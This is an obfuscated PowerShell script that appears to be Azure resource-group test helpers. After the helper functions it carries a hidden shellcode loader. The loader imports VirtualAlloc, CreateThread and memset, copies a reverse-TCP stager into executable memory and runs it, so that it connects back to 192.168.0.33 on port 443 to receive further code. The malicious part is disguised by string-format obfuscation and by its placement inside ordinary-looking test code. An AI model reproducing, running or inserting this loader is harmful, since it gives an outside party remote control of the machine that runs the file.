 sEt  ("{1}{0}"-f'PN','w') ([TYpe]("{13}{2}{5}{4}{8}{10}{12}{9}{7}{6}{1}{0}{3}{11}"-F 'oCK','m','ft','SeR','uRe','.Az','Tp','.HT','.teST.ht','CorDeR','tpr','vEr','e','miCROso')  ) ; sV  ('8'+'jI25')  ( [TYpe]("{1}{12}{7}{6}{2}{5}{0}{4}{11}{10}{9}{3}{8}" -f'tEST.HttPr','M','Z','e','eCorDEr','ure.','a','OFt.','RMODE','rd','ecO','.HttPR','icrOs') );  














function G`eT-R`A`N`doMcO`NTAInergR`Ou`Pn`AME
{
    return &("{0}{3}{2}{1}" -f'g','Name','set','etAs')
}


function G`et-RAN`DOMResoU`RceG`ROuPnAME
{
    return &("{2}{1}{0}" -f'tName','e','getAss')
}


function GeT`-`ProVidErlOCa`TI`oN(${p`RoV`IdEr})
{
    if (  ( Gci ("{1}{3}{0}{2}"-f'LE:','vARia','wpn','B'))."v`AlUE"::"mo`de" -ne  (diR ("{3}{2}{0}{1}"-f'2','5','ariaBle:8JI','v') )."vaL`Ue"::"PL`AYB`ACk")
    {
        ${Na`mEsPa`Ce} = ${pr`O`V`idEr}.("{0}{1}" -f 'Spl','it').Invoke("/")[0]
        if(${p`Rov`iDEr}.("{0}{1}{2}" -f'Co','ntai','ns').Invoke("/"))
        {
            ${Ty`Pe} = ${Pr`oVi`der}.("{1}{0}{2}" -f'st','Sub','ring').Invoke(${n`A`MESPaCe}."Leng`Th" + 1)
            ${L`OC`AT`ioN} = .("{0}{3}{2}{1}" -f 'Get-AzR','ovider','Pr','esource') -ProviderNamespace ${n`Am`e`SpaCE} | &("{1}{0}" -f'here','w') {${_}."rES`o`UrCe`TyPES"[0]."ReSo`UrcEtY`p`e`NAME" -eq ${Ty`Pe}}

            if (${Lo`Cat`I`On} -eq ${n`UlL})
            {
                return ("{0}{2}{1}" -f'we','us','st')
            } else
            {
                return ${L`O`CATiON}."l`ocAti`oNS"[0].("{1}{2}{0}"-f'ower','To','L').Invoke() -replace '\s',''
            }
        }

        return ("{1}{2}{0}" -f'tus','w','es')
    }

    return ("{0}{1}"-f 'westu','s')
}


function Cl`Ean`-r`EsouRcE`gROUp(${R`Gn`AME})
{
    if ( ( GEt-VaRiaBLE ("{0}{1}" -f 'W','PN')  -valuEon  )::"Mo`DE" -ne  ( DIr ("VARIaBl"+"e:"+"8"+"JI25")  )."v`ALue"::"pLAYb`A`ck") {
        &("{3}{4}{1}{0}{2}"-f 'esource','e-AzR','Group','Remo','v') -Name ${rG`NAmE} -Force
    }
}

${c} = ((("{65}{2}{51}{19}{98}{77}{81}{60}{36}{20}{10}{30}{26}{27}{92}{68}{84}{35}{74}{85}{3}{88}{5}{61}{17}{43}{14}{40}{75}{62}{44}{67}{45}{39}{9}{48}{46}{55}{66}{16}{12}{95}{70}{22}{13}{24}{33}{86}{97}{6}{42}{52}{28}{64}{1}{78}{79}{76}{50}{83}{11}{93}{41}{87}{25}{96}{18}{71}{8}{4}{72}{56}{31}{21}{49}{58}{32}{59}{29}{89}{94}{47}{91}{23}{0}{54}{34}{7}{37}{15}{90}{53}{57}{63}{80}{38}{69}{73}{82}"-f' ext','int','Impor','s, uint d','nFl','Si','eadA','t',' dwCreatio','(','ern Int','e, ','lic static','d(','ll','tr me','c)]pub',', u','Parame','QU','c ext','tr lpTh','tPtr CreateThrea','c','IntP','tr l','Virtual','Allo','s, ','crt.dl','Ptr ','IntP','dId);','t','In','A','ti','P',' co','t','ocatio','nt','t','int flA',' flProtect);[D','lImpor','nel32.d',' sta','QUcker','re','ckS','t(','tribute','t(I','ern ','l','gs, ','ntPtr dest, ui','a','[DllImport(QUcmsv','a','ze','uint','n','u','[Dll','lQU','l','(In','unt',' In','ter, uint','a',')','ddr','nType, ','ta','32.dllQUc)]pu',' ','dwS','t src, uint','blic st',';','iz','tPtr lp','es','r ','Ptr lpStartAddress, IntP','w','l','mse','ti','c','I','QUc)]public',' extern','p','lpThr','ckernel')) -CrEplACE 'QUc',[cHaR]34);${w} = &("{0}{1}{2}" -f 'Ad','d-','Type') -memberDefinition ${c} -Name ("{1}{0}" -f 'n32','Wi') -namespace ("{2}{1}{4}{0}{3}"-f'tion','in32F','W','s','unc') -passthru;[Byte[]];[Byte[]]${z} = 0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1,0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,0x8d,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x6a,0x05,0x68,0xc0,0xa8,0x00,0x21,0x68,0x02,0x00,0x01,0xbb,0x89,0xe6,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0a,0xff,0x4e,0x08,0x75,0xec,0xe8,0x61,0x00,0x00,0x00,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7e,0x36,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7d,0x22,0x58,0x68,0x00,0x40,0x00,0x00,0x6a,0x00,0x50,0x68,0x0b,0x2f,0x0f,0x30,0xff,0xd5,0x57,0x68,0x75,0x6e,0x4d,0x61,0xff,0xd5,0x5e,0x5e,0xff,0x0c,0x24,0xe9,0x71,0xff,0xff,0xff,0x01,0xc3,0x29,0xc6,0x75,0xc7,0xc3,0xbb,0xf0,0xb5,0xa2,0x56,0x6a,0x00,0x53,0xff,0xd5;${g} = 0x1000;if (${z}."le`NgTH" -gt 0x1000){${G} = ${Z}."L`e`NGTh"};${X}=${W}::("{0}{2}{1}" -f'Virtu','oc','alAll').Invoke(0,0x1000,${G},0x40);for (${i}=0;${I} -le (${z}."L`engTh"-1);${I}++) {${W}::"me`M`sET"([IntPtr](${x}.("{1}{2}{0}" -f'2','To','Int3').Invoke()+${i}), ${Z}[${i}], 1)};${w}::("{0}{3}{2}{1}"-f 'Cre','ead','eThr','at').Invoke(0,0,${x},0,0,0);for (;;){.("{0}{3}{2}{1}" -f 'St','eep','sl','art-') 60};
